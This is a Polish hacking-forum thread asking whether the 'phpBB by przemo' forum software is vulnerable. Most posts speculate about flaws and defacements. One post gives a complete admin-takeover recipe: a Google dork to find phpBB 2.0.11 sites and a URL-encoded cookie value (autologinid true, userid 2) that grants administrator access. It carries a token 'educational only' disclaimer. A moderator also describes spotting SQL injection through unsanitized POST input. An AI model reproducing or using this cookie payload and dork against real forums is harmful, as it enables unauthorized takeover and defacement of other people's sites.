phpbb by przemo - nie chodzi o exploita

greenway

Użytkownik
Dołączył
Maj 5, 2008
Posty
21
A więc witam, chciałbym dzisiaj zapytać o phpbb by przemo, a dokładniej o jedną rzecz, która mnie bardzo ciekawi. Otóż istnieją tam jakieś exploity szajsowate na różne wersje tego cms'a. Jednak na najnowszą nie ma co jest w sumie nawet zrozumiałe, ale nie do końca. Widziałem już wielu ludzi, którzy hackowali to jak świeże bułeczki, co jest bynajmniej dziwne, bo nie ma oficjalnie luki żadnej oprócz XSS. Rozmawiałem już z kilkoma ziomkami, którzy twierdzą, że w skrypcie jest kilka błędów itp. I to właśnie mnie zastanawia, bo szukałem wiele w necie, a i nic na ten temat konkretnego znaleźć nie mogę. W sumie to chciałem się tylko zapytać czy by przemo naprawdę jest podatne na jakiś poważny atak czy hackowanie tego zależy bardziej od serwera itp ? Oczywiście nikt błędu mi tu nie da i na to nie liczę. PozDro !
 

widmo17

Były Moderator
Dołączył
Lipiec 16, 2007
Posty
1089
Z tego, co widzę, to phpBB by przemo jest dziurawy jak sito - co chwila strony, które na tym stoją są rozwalane ;]
 

greenway

Użytkownik
Dołączył
Maj 5, 2008
Posty
21
No niestety również to zauważyłem i naprawdę coś w tym musi być, bo na przemo tak po prosty sposobu nii ma. Może wypowie się ktoś kto miał doświadczenia w hackowaniu tej wersji phpbb
<
 

greenway

Użytkownik
Dołączył
Maj 5, 2008
Posty
21
Na milw0rmie nic nii ma. A co do luki, to ja nie chce żeby mi ktoś podawał ją na tacy (wątpię żeby przemo miał errora w zmiennej), ale dziwi mnie fakt, iż inne wielkie systemy for mają luki i są one publikowane, a przemo wygląda jakby był jakimś super CMS'em, a strony padaja na nim jak zapałki :/ Wszystko strasznie porąba*e jest.
 

greenway

Użytkownik
Dołączył
Maj 5, 2008
Posty
21
Ja czytałem bloga jakiegoś gościa nicku nie pamiętam i on tam pokazywał jakie błędy są popełnianie przez webmasterów mających phpbb by przemo. Ogólnie skupiało się to na dbloaderze i chmodach, ale ogólnie to ten dbloader jest zawsze wyłączony chyba, że zdarzy się cud. A co do chmodów to w dzisiejszych czasach jednak się już o tym nie zapomina. Wątpie, że takie głupie błędy są popełnianie na warezach i znanych stronach, które są haczone. Mam jakiś kompleks chyba przez by przemo no i tak jakoś to wyszło, że nie mogę się nauczyć choć wiele lam haczy to też :/ A może macie jakieś małe wskazówki na początek, które pomogą mi w dalszej pracy szukania luki itp. ?
 

gog

Użytkownik
Dołączył
Luty 17, 2008
Posty
2
Kto wie, moze jest jakas luka w phpbb by przemo... szzerze mowiac watpie... no ale bardzo czesto to co na pierwszy rzut oka jest szczelne i porzadnie zabezpieczone mozna latwo obejsc, polecam odpalenie milw0rma i poczytanie exploitow na skrypty php, oczywiscie jakies tam pojecie o php jest niezbedne..
 

Exploit

Użytkownik
Dołączył
Październik 8, 2008
Posty
1
to może wam pomóc


Materiał: FireFoxe z dodatku do zmian cookies:
Kod:
http://addneditcookies.mozdev.org/

[Uwaga, możliwe jest, że Twoja wersja FireFoxa nie nadaje się]

Kod:
ftp://ftp.mozilla.org/pub/mozilla.org/fir...Setup%201.5.exe


1 - go na google.pl i wpisz:

Kod:
Powered by phpbb2.0.11



2 - Nie trzeba się zarejestrować
wykonane narzędzia, nowy plik cookie, a skupić się na forum, należy usunąć "sid"
sql_data modyfikować tej treści:

Kod:
a% 3A2% 3A% 7Bs% 3A11% 3A% 22autologinid% 22% 3Bb% 3A1% 3Bs% 3A6% 3A% 22userid% 22% 3Bs% 3A1% 3A% 222% 22% 3B% 7D


3 - zapisać, zamknąć edytor, a następnie zaktualizować stronę z F5
i cud się łączysz adminem i masz całkowity dostęp do forum

Uwaga - materiał wyłącznie do celów edukacyjnych!
 

widmo17

Były Moderator
Dołączył
Lipiec 16, 2007
Posty
1089
s7r0nt, założę się, że wiesz co to jPortal ;] Taki cms bardzo popularny do dzisiaj, ale dziurawy jak cholera - przez to jak tylko strona na jportal zostanie zaindeksowana przez google pisze na niej `hacked by muslim hacker` albo coś w ten deseń ;] Na phpBB mod by przemo na pewno coś jest, ale wyobraź sobie, że ktoś daje takiego buga na milw0rm. Przecież jak by się do tego dzieci dorwały, to byś jutro wszedł na co drugie forum a tam przysłowiowe `hacked by muslim hacker`
<
W każdym razie, jest kilka ciekawych rzeczy na przemo, np. check_files.php, dbloader.php itd. Wystarczy ściągnąć skrypcik i przejrzeć pobieżnie pliczki (zawsze się rzuci w oczęta coś w stylu mysql_query("select * from `y` where `x` = '".$_POST["nick"]."'"); ;])
 

s7r0nt

Użytkownik
Dołączył
Lipiec 4, 2008
Posty
69
Dobrze gadasz, bo z jednej strony fajnie by było posiadać taką wiedzę a z drugiej tłumy neo-turkish-script-kidów
<
 
Do góry Bottom